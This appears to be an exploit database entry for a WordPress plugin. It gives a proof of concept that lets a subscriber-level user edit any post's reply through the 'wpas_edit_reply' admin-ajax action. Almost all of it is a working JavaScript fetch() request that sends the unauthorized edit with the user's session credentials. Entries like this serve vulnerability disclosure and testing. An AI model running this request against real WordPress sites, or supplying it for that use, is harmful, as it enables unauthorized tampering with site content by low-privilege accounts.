Share
## https://sploitus.com/exploit?id=WPEX-ID:D32B2136-D923-4F36-BD76-AF4578DEB23B
Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
  "method": "POST",
  "credentials": "include"
});